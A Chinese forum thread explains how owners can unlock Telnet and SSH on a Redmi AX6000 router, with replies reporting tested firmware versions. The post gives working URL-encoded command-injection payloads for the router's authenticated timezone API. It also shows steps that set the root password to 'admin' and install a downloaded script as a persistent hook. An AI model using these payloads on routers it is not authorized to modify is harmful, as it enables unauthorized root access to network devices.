【解锁SSH】红米Redmi AX6000开启并固化SSH、Telnet的简单方法（RB06）

高伟凡 · 发表于 2022-9-9 00:39

本帖最后由高伟凡于 2022-9-10 13:06 编辑

参考
https://openwrt.org/toh/xiaomi/redmi_ax6000
https://forum.openwrt.org/t/add- ... i-ax6000/125008/142
https://github.com/lemoeo/AX6S
https://www.right.com.cn/forum/thread-8253125-1-1.html

说明：电脑先连上AX6000（网线、WiFi均可），并登录192.168.31.1
WeChat Screenshot_20220909004031.png

登陆成功后在网址栏可以看见token，即加红部分
示例：192.168.31.1/cgi-bin/luci/;stok=60522452fadf088a65c6bf93645282a1/web/home#router
将下方的{token}替换为自己的token即可。

一、开启TELNET：
此处利用了openwrt论坛@remittor发现的LUA脚本漏洞，参见https://forum.openwrt.org/t/add-openwrt-support-for-xiaomi-redmi-ax6000/125008/132
1.开启开发/调试模式（此模式下允许修改Bdata）
相当于执行zz=$(dd if=/dev/zero bs=1 count=2 2>/dev/null) ; printf '\xA5\x5A%c%c' $zz $zz | mtd write - crash ; 也就是将\xA5\x5A\x00\x00写入crash分区

http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3B%20zz%3D%24%28dd%20if%3D%2Fdev%2Fzero%20bs%3D1%20count%3D2%202%3E%2Fdev%2Fnull%29%20%3B%20printf%20%27%A5%5A%25c%25c%27%20%24zz%20%24zz%20%7C%20mtd%20write%20-%20crash%20%3B%20

复制代码

2.重启
相当于执行reboot

http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3b%20reboot%20%3b%20

复制代码

3.设置Bdata永久开启telnet
相当于执行bdata set telnet_en=1 ; bdata set ssh_en=1 ; bdata set uart_en=1 ; bdata commit ; 即开启telnet、ssh、uart（ssh有另一套识别机制，此处打开不起作用，下面还有其他步骤）

http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3B%20bdata%20set%20telnet_en%3D1%20%3B%20bdata%20set%20ssh_en%3D1%20%3B%20bdata%20set%20uart_en%3D1%20%3B%20bdata%20commit%20%3B%20

复制代码

4.重启
相当于执行reboot

http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3b%20reboot%20%3b%20

复制代码

此时重启后可以通过telnet连接192.168.31.1，无需密码即可登录。

二、开启SSH：
连上telnet后运行下列命令：
1.修改root密码为admin（不修改也可以通过SN计算默认密码，此处不再赘述）

echo -e 'admin\nadmin' | passwd root

复制代码

2.固化SSH

nvram set ssh_en=1
nvram set telnet_en=1
nvram set uart_en=1
nvram set boot_wait=on
nvram commit

复制代码

3.临时开启SSH（重启会自动关闭，若想永久开启可以跳过，直接进行4）：

sed -i 's/channel=.*/channel="debug"/g' /etc/init.d/dropbear
/etc/init.d/dropbear restart

复制代码

4.永久开启SSH（重启不会关闭）：
参见https://github.com/lemoeo/AX6S

mkdir /data/auto_ssh && cd /data/auto_ssh
curl -O https://cdn.jsdelivr.net/gh/lemoeo/AX6S@main/auto_ssh.sh
chmod +x auto_ssh.sh
uci set firewall.auto_ssh=include
uci set firewall.auto_ssh.type='script'
uci set firewall.auto_ssh.path='/data/auto_ssh/auto_ssh.sh'
uci set firewall.auto_ssh.enabled='1'
uci commit firewall

复制代码

5.修改时区设置
因为开启telnet用的时区设置接口lua脚本的漏洞，故完成上述操作后还需恢复原始的时区设置。

uci set system.@system[0].timezone='CST-8'
uci set system.@system[0].webtimezone='CST-8'
uci set system.@system[0].timezoneindex='2.84'
uci commit

复制代码

6.关闭开发/调试模式

mtd erase crash

复制代码

7.重启

reboot

复制代码

此时重启后可以通过ssh或telnet连接192.168.31.1，登录用户名root，密码admin。

高伟凡 · 发表于 2022-9-9 00:59

本帖最后由高伟凡于 2022-9-9 01:54 编辑

理论上支持的固件版本（标红为已测试版本）：
稳定版：
1.0.45
1.0.48
1.0.53
1.0.55
1.0.56
1.0.60

开发版：
1.2.2
1.2.3
1.2.4
1.2.5
1.2.7
1.2.8

tangshui1122 · 发表于 2022-9-9 00:54

请问不关闭调式模式是不是不能组mesh？

237176253 · 发表于 2022-9-9 00:59

不错，明年降300了搞个

高伟凡 · 发表于 2022-9-9 01:01

tangshui1122 发表于 2022-9-9 00:54
请问不关闭调式模式是不是不能组mesh？

这个不太清楚，但是不关闭的话telnet无需密码即可进入，非常危险

超逸绝尘 · 发表于 2022-9-9 01:07

这个是非常好的方式

tangshui1122 · 发表于 2022-9-9 01:22

请问这个永久开启ssh 恢复出厂设置ssh还在吗？

yayaya · 发表于 2022-9-9 01:40

感谢你的分享

高伟凡 · 发表于 2022-9-9 01:42

tangshui1122 发表于 2022-9-9 01:22
请问这个永久开启ssh 恢复出厂设置ssh还在吗？

理论上恢复出厂设置以后ssh就没了，需要再开启一次，但是telnet应该还有

1395771241 · 发表于 2022-9-9 01:53

1.27版本已成功，1.28已成功，1.2.4已成功，建议直接更新到最新版1.2.8

tangshui1122 · 发表于 2022-9-9 03:06

高伟凡发表于 2022-9-9 01:42
理论上恢复出厂设置以后ssh就没了，需要再开启一次，但是telnet应该还有

感谢大佬

霍森布鲁茨老爷 · 发表于 2022-9-9 08:23

多谢分享

ChasonChen · 发表于 2022-9-9 08:28

火钳刘明

zph308 · 发表于 2022-9-9 09:13

虽然我没有ax6000 但还是要为大佬点赞

可坏爱吃鱼 · 发表于 2022-9-9 09:18

mark，pdd3804入了个

账号		自动登录	找回密码
密码			立即注册

[小米其它型号路由器] 【解锁SSH】红米Redmi AX6000开启并固化SSH、Telnet的简单方法（RB06）

评分

相关帖子

点评

点评

点评

点评